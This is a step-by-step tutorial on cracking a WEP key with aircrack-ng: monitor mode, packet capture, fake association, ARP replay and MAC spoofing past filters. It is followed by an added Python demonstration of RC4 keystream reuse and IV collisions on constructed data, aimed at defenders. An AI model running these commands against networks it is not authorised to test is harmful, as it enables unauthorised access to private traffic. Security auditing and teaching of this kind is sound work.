Cracking A WEP Key
- Download aircrack-ng source
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
- Change the CFLAGS line in ~/src/aircrack-ng/common.mak to:
CFLAGS ?= -g -W -Wall -Werror -fno-strict-aliasing -O3
- Compile and install:
make && sudo make install
- Use kismet to get the channel (11), ESSID (crackme), and BSSID (00:18:4D:85:65:4F) of the access point to be cracked.
These tools are fussy about hex addresses: include leading zeros and do not use lower-case hex digits.
- Become root:
su -
- Put NIC into monitor mode:
airmon-ng start wlan0
- Start capturing packets:
airodump-ng -w dumpfile -c 11 -i mon0
New terminal session:
- Associate with the target AP:
/usr/local/sbin/aireplay-ng -1 0 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0
If that does not associate successfully, the AP may have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully, then take its MAC address and substitute it for the -h value.
- Start replaying packets so that more packets (and hence more IVs) are captured:
/usr/local/sbin/aireplay-ng -3 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0
Watch the Data column in the airodump-ng session; we want more than 100,000 unique IVs.
- Ctrl-C the dump process and crack the key:
aircrack-ng dumpfile.ivs
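The procedure above works because of WEP's design, not because of anything clever in the tools: each frame is encrypted with RC4 under a per-packet key of IV (3 bytes, sent in the clear) followed by the shared key, so the 24-bit IV space is tiny and any two frames that reuse an IV share a keystream. The following Python block is an added illustration written for this page; it is not part of the original wiki text and not aircrack-ng code. The RC4 routine, the 40-bit "shared key", the IV and the sample frames are all constructed for the demonstration, and the CRC-32 ICV that real WEP appends is omitted. It shows (a) that one frame with known plaintext under a repeated IV exposes the other frame's plaintext without knowing the key, and (b) the birthday-bound estimate of how few frames a network needs before an IV repeats, which is why a WEP network must be treated as unencrypted and migrated to WPA2/WPA3.

```python
"""Why WEP's 24-bit IV is fatal: RC4 keystream reuse and the birthday bound.

Added illustration for this page (not aircrack-ng code). Everything here,
including the shared key and the sample frames, is constructed.
"""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling (KSA) then keystream generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style framing: 3-byte IV in the clear, body = RC4(IV || key) XOR plaintext.
    (Real WEP also appends a CRC-32 ICV before encryption; omitted here.)"""
    assert len(iv) == 3
    keystream = rc4_keystream(iv + shared_key, len(plaintext))
    return iv + xor_bytes(plaintext, keystream)


def recover_under_reused_iv(frame_known: bytes, known_plaintext: bytes,
                            frame_other: bytes) -> bytes:
    """Two frames share an IV; the first frame's plaintext is known (in practice a
    fixed header such as LLC/SNAP). XOR-ing it with the ciphertext yields the
    keystream, which then decrypts as much of the second frame as it covers.
    No key material is involved: this is the two-time-pad weakness of any stream
    cipher whose keystream is reused."""
    iv_known, body_known = frame_known[:3], frame_known[3:]
    iv_other, body_other = frame_other[:3], frame_other[3:]
    if iv_known != iv_other:
        raise ValueError("frames use different IVs; keystream is not shared")
    keystream = xor_bytes(body_known, known_plaintext)
    return xor_bytes(body_other, keystream)   # zip() truncates to the shorter input


def expected_frames_until_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound: about sqrt(pi/2 * N) random IVs before the first repeat."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def frames_for_collision_probability(p: float, iv_bits: int = 24) -> int:
    """Smallest n with P(some IV repeats among n random IVs) >= p, using the
    standard approximation P ~ 1 - exp(-n^2 / (2N))."""
    n_space = 2 ** iv_bits
    return math.ceil(math.sqrt(-2 * n_space * math.log(1 - p)))


def demo() -> tuple:
    """Constructed scenario: a 40-bit key, one IV used twice, one known plaintext."""
    shared_key = b"\x01\x02\x03\x04\x05"                  # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                                   # constructed, reused IV
    known = b"\xaa\xaa\x03\x00\x00\x00\x08\x00 known-hdr"  # frame A, plaintext known
    secret = b"\xaa\xaa\x03\x00\x00\x00\x08\x00 secret!"   # frame B, plaintext unknown
    frame_a = wep_encrypt(shared_key, iv, known)
    frame_b = wep_encrypt(shared_key, iv, secret)
    recovered = recover_under_reused_iv(frame_a, known, frame_b)
    return recovered, secret, expected_frames_until_iv_repeat()


if __name__ == "__main__":
    recovered, secret, n_expected = demo()
    print("recovered without key:", recovered)
    print("matches real plaintext:", recovered == secret)
    print("frames until first IV repeat (expected):", round(n_expected))
    print("frames for 50% chance of a repeat:", frames_for_collision_probability(0.5))
```

The numbers are the point for a defender: a few thousand frames, i.e. minutes on a busy network, already produce an IV repeat, and the tutorial's 100,000-IV target is far beyond that. The key-recovery step that aircrack-ng performs (the related-key statistical attacks on RC4's key schedule) is not reproduced here; the demonstration only shows why keystream reuse alone already breaks confidentiality.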